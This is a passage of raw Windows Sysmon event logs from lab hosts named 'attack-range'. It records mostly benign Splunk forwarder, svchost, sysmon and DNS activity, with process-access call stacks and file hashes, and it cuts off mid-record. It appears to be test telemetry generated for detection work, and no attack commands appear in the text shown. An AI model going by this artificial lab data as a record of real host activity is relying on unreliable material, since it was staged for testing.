Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044680Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.846{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39826ACE619802C26ACD7D6FA13E7D2E,SHA256=F67BD363EF5FE2EAE914EDECC9A097C5C12DCCB66B8BDB9C259D5E5F164F4107,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044679Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.846{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=145EEEE8F1E09B92F31C9FA2A71BEE6A,SHA256=F9FCF2B38B8CC7C2E73FD1ADF79A5ACD52517AA8F80B47F535609C70921047CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044678Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.408{0A5DF930-18C0-629A-2A07-000000006002}14602040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000205895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:45.674{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56415-false10.0.1.12-8000- 23542300x8000000000000000205894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:48.068{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAE7A07A30B08F5B4043A32B27B8CD00,SHA256=664F54A2B028844ADDB03B44ECFE8EAC85DE51F23FFD809E746ADC5A993574D0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044677Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.205{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-18C0-629A-2A07-000000006002}1460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044676Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.205{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044675Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.205{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044674Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.205{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044673Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.205{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044672Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.205{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044671Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.205{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044670Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.205{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044669Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.205{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044668Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.205{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044667Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.205{0A5DF930-E35B-6299-0500-000000006002}4121840C:\Windows\system32\csrss.exe{0A5DF930-18C0-629A-2A07-000000006002}1460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044666Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.205{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-18C0-629A-2A07-000000006002}1460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044665Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.206{0A5DF930-18C0-629A-2A07-000000006002}1460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044694Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:49.502{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2F0667FFB8D9D6081236B0670C70592,SHA256=A5239B2EA6C1EF68353C49D03B0DA43DC6204978C7B16971845A5A079FA9CF68,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:46.944{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61637-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:46.944{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53868- 354300x8000000000000000205897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:46.944{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53868-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 23542300x8000000000000000205896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:49.204{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5DA704E326697574402FF4BC41DBBA7,SHA256=4B2F40A238708093EADD830562D117CB1044BF98C261B9A9CFEE96180D578D81,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044723Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.955{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-18C2-629A-2D07-000000006002}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044722Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.955{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044721Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.955{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044720Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.955{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044719Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.955{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044718Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.955{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044717Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.955{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044716Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 